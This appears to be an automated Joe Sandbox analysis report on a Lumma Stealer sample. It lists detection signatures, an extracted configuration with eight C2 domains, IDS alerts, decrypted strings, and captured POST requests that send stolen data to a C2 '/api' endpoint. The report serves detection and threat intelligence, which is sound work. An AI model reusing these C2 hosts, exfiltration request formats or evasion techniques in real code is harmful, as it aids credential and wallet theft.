Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1546005
MD5:d6d4c4264450023d69bda4d017fe3771
SHA1:ce52488d60a985b5a6f66d87fd651a24945bba72
SHA256:3da9dc898a09a8c3f35ddcda206e53a2da0be374de54145f3acf6c0d146a72c8
Tags:exeuser-Bitsight
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6764 cmdline: "C:\Users\user\Desktop\file.exe" MD5: D6D4C4264450023D69BDA4D017FE3771)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["fadehairucw.store", "necklacedmny.store", "presticitpo.store", "navygenerayk.store", "thumbystriw.store", "scriptyprefej.store", "crisiwarny.store", "founpiuer.store"], "Build id": "4SD0y4--legendaryy"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    Process Memory Space: file.exe PID: 6764JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      Process Memory Space: file.exe PID: 6764JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
        decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

          Sigma Signatures

          No Sigma rule has matched

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-31T11:28:07.028474+010020229301A Network Trojan was detected20.12.23.50443192.168.2.549713TCP
          2024-10-31T11:28:45.280437+010020229301A Network Trojan was detected20.12.23.50443192.168.2.549912TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-31T11:27:50.935268+010020283713Unknown Traffic192.168.2.549705188.114.96.3443TCP
          2024-10-31T11:27:52.428175+010020283713Unknown Traffic192.168.2.549706188.114.96.3443TCP
          2024-10-31T11:27:53.818091+010020283713Unknown Traffic192.168.2.549707188.114.96.3443TCP
          2024-10-31T11:27:55.282025+010020283713Unknown Traffic192.168.2.549708188.114.96.3443TCP
          2024-10-31T11:27:56.680878+010020283713Unknown Traffic192.168.2.549709188.114.96.3443TCP
          2024-10-31T11:27:58.356580+010020283713Unknown Traffic192.168.2.549710188.114.96.3443TCP
          2024-10-31T11:28:00.140619+010020283713Unknown Traffic192.168.2.549711188.114.96.3443TCP
          2024-10-31T11:28:02.159347+010020283713Unknown Traffic192.168.2.549712188.114.96.3443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-31T11:27:51.684144+010020546531A Network Trojan was detected192.168.2.549705188.114.96.3443TCP
          2024-10-31T11:27:52.922763+010020546531A Network Trojan was detected192.168.2.549706188.114.96.3443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-31T11:27:51.684144+010020498361A Network Trojan was detected192.168.2.549705188.114.96.3443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-31T11:27:52.922763+010020498121A Network Trojan was detected192.168.2.549706188.114.96.3443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-31T11:27:50.935268+010020571241Domain Observed Used for C2 Detected192.168.2.549705188.114.96.3443TCP
          2024-10-31T11:27:52.428175+010020571241Domain Observed Used for C2 Detected192.168.2.549706188.114.96.3443TCP
          2024-10-31T11:27:53.818091+010020571241Domain Observed Used for C2 Detected192.168.2.549707188.114.96.3443TCP
          2024-10-31T11:27:55.282025+010020571241Domain Observed Used for C2 Detected192.168.2.549708188.114.96.3443TCP
          2024-10-31T11:27:56.680878+010020571241Domain Observed Used for C2 Detected192.168.2.549709188.114.96.3443TCP
          2024-10-31T11:27:58.356580+010020571241Domain Observed Used for C2 Detected192.168.2.549710188.114.96.3443TCP
          2024-10-31T11:28:00.140619+010020571241Domain Observed Used for C2 Detected192.168.2.549711188.114.96.3443TCP
          2024-10-31T11:28:02.159347+010020571241Domain Observed Used for C2 Detected192.168.2.549712188.114.96.3443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-31T11:27:50.209112+010020571291Domain Observed Used for C2 Detected192.168.2.5604731.1.1.153UDP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-31T11:27:50.219788+010020571271Domain Observed Used for C2 Detected192.168.2.5561361.1.1.153UDP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-31T11:27:50.254410+010020571231Domain Observed Used for C2 Detected192.168.2.5571121.1.1.153UDP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-31T11:27:50.193064+010020571311Domain Observed Used for C2 Detected192.168.2.5570981.1.1.153UDP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-31T11:27:50.243010+010020571251Domain Observed Used for C2 Detected192.168.2.5526981.1.1.153UDP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-31T11:27:59.019842+010020480941Malware Command and Control Activity Detected192.168.2.549710188.114.96.3443TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus / Scanner detection for submitted sample
          Source: file.exeAvira: detected
          Found malware configuration
          Source: file.exe.6764.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["fadehairucw.store", "necklacedmny.store", "presticitpo.store", "navygenerayk.store", "thumbystriw.store", "scriptyprefej.store", "crisiwarny.store", "founpiuer.store"], "Build id": "4SD0y4--legendaryy"}
          Multi AV Scanner detection for submitted file
          Source: file.exeReversingLabs: Detection: 39%
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Machine Learning detection for sample
          Source: file.exeJoe Sandbox ML: detected
          Sample uses string decryption to hide its real strings
          Source: 00000000.00000002.2172563420.00000000007A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: scriptyprefej.store
          Source: 00000000.00000002.2172563420.00000000007A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: navygenerayk.store
          Source: 00000000.00000002.2172563420.00000000007A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: founpiuer.store
          Source: 00000000.00000002.2172563420.00000000007A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: necklacedmny.store
          Source: 00000000.00000002.2172563420.00000000007A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: thumbystriw.store
          Source: 00000000.00000002.2172563420.00000000007A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: fadehairucw.store
          Source: 00000000.00000002.2172563420.00000000007A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: crisiwarny.store
          Source: 00000000.00000002.2172563420.00000000007A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: presticitpo.store
          Source: 00000000.00000002.2172563420.00000000007A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: presticitpo.store
          Source: 00000000.00000002.2172563420.00000000007A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
          Source: 00000000.00000002.2172563420.00000000007A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
          Source: 00000000.00000002.2172563420.00000000007A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
          Source: 00000000.00000002.2172563420.00000000007A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
          Source: 00000000.00000002.2172563420.00000000007A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
          Source: 00000000.00000002.2172563420.00000000007A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: 4SD0y4--legendaryy
          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49705 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49706 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49707 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49707 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49708 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49709 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49710 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49711 version: TLS 1.2

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2057123 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store) : 192.168.2.5:57112 -> 1.1.1.1:53
          Source: Network trafficSuricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.5:60473 -> 1.1.1.1:53
          Source: Network trafficSuricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.5:52698 -> 1.1.1.1:53
          Source: Network trafficSuricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.5:57098 -> 1.1.1.1:53
          Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49705 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49710 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49708 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49711 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49706 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49707 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.5:56136 -> 1.1.1.1:53
          Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49712 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49709 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49705 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49710 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49706 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49706 -> 188.114.96.3:443
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: fadehairucw.store
          Source: Malware configuration extractorURLs: necklacedmny.store
          Source: Malware configuration extractorURLs: presticitpo.store
          Source: Malware configuration extractorURLs: navygenerayk.store
          Source: Malware configuration extractorURLs: thumbystriw.store
          Source: Malware configuration extractorURLs: scriptyprefej.store
          Source: Malware configuration extractorURLs: crisiwarny.store
          Source: Malware configuration extractorURLs: founpiuer.store
          Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
          Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49710 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49711 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49707 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49712 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49709 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.5:49912
          Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.5:49713
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: necklacedmny.store
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: necklacedmny.store
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12840Host: necklacedmny.store
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15082Host: necklacedmny.store
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20572Host: necklacedmny.store
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1237Host: necklacedmny.store
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 570133Host: necklacedmny.store
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficDNS traffic detected: DNS query: presticitpo.store
          Source: global trafficDNS traffic detected: DNS query: crisiwarny.store
          Source: global trafficDNS traffic detected: DNS query: fadehairucw.store
          Source: global trafficDNS traffic detected: DNS query: thumbystriw.store
          Source: global trafficDNS traffic detected: DNS query: necklacedmny.store
          Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: necklacedmny.store
          Source: file.exe, 00000000.00000003.2109354346.00000000058FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
          Source: file.exe, 00000000.00000003.2109354346.00000000058FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
          Source: file.exe, 00000000.00000003.2109354346.00000000058FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
          Source: file.exe, 00000000.00000003.2109354346.00000000058FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
          Source: file.exe, 00000000.00000003.2109354346.00000000058FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
          Source: file.exe, 00000000.00000003.2109354346.00000000058FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
          Source: file.exe, 00000000.00000003.2109354346.00000000058FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
          Source: file.exe, 00000000.00000003.2109354346.00000000058FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: file.exe, 00000000.00000003.2109354346.00000000058FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
          Source: file.exe, 00000000.00000003.2109354346.00000000058FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
          Source: file.exe, 00000000.00000003.2109354346.00000000058FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
          Source: file.exe, 00000000.00000003.2081897605.0000000005829000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081782731.0000000005829000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081712312.000000000582C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: file.exe, 00000000.00000003.2110851091.000000000108D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
          Source: file.exe, 00000000.00000003.2110851091.000000000108D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
          Source: file.exe, 00000000.00000003.2081897605.0000000005829000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081782731.0000000005829000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081712312.000000000582C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: file.exe, 00000000.00000003.2081897605.0000000005829000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081782731.0000000005829000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081712312.000000000582C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: file.exe, 00000000.00000003.2081897605.0000000005829000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081782731.0000000005829000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081712312.000000000582C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: file.exe, 00000000.00000003.2110851091.000000000108D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
          Source: file.exe, 00000000.00000003.2110851091.000000000108D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
          Source: file.exe, 00000000.00000003.2081897605.0000000005829000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081782731.0000000005829000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081712312.000000000582C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: file.exe, 00000000.00000003.2081897605.0000000005829000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081782731.0000000005829000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081712312.000000000582C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: file.exe, 00000000.00000003.2081897605.0000000005829000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081782731.0000000005829000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081712312.000000000582C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: file.exe, 00000000.00000003.2110851091.000000000108D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
          Source: file.exe, 00000000.00000002.2176009298.00000000057F2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172310521.00000000057F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store
          Source: file.exe, 00000000.00000003.2124441129.0000000001077000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2151772082.0000000001084000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/
          Source: file.exe, 00000000.00000002.2174291854.0000000001084000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140500751.0000000001084000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2125885120.000000000107F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2126281997.0000000001084000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2144388189.0000000001084000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2124441129.0000000001077000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2151772082.0000000001084000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/#
          Source: file.exe, 00000000.00000002.2174291854.0000000001084000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140500751.0000000001084000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2125885120.000000000107F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2126281997.0000000001084000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2144388189.0000000001084000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2124441129.0000000001077000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2151772082.0000000001084000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/K
          Source: file.exe, file.exe, 00000000.00000003.2169316679.0000000005801000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2174291854.0000000001084000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2174079269.0000000001015000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140595367.0000000005801000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172028798.0000000001015000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2176031548.0000000005801000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2080663083.000000000106D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2151922850.0000000005801000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140500751.0000000001084000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2124441129.0000000001077000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2151772082.0000000001084000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/api
          Source: file.exe, 00000000.00000003.2169316679.0000000005801000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2176031548.0000000005801000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2151922850.0000000005801000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/api5
          Source: file.exe, 00000000.00000003.2169316679.0000000005801000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2176031548.0000000005801000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2151922850.0000000005801000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/api?
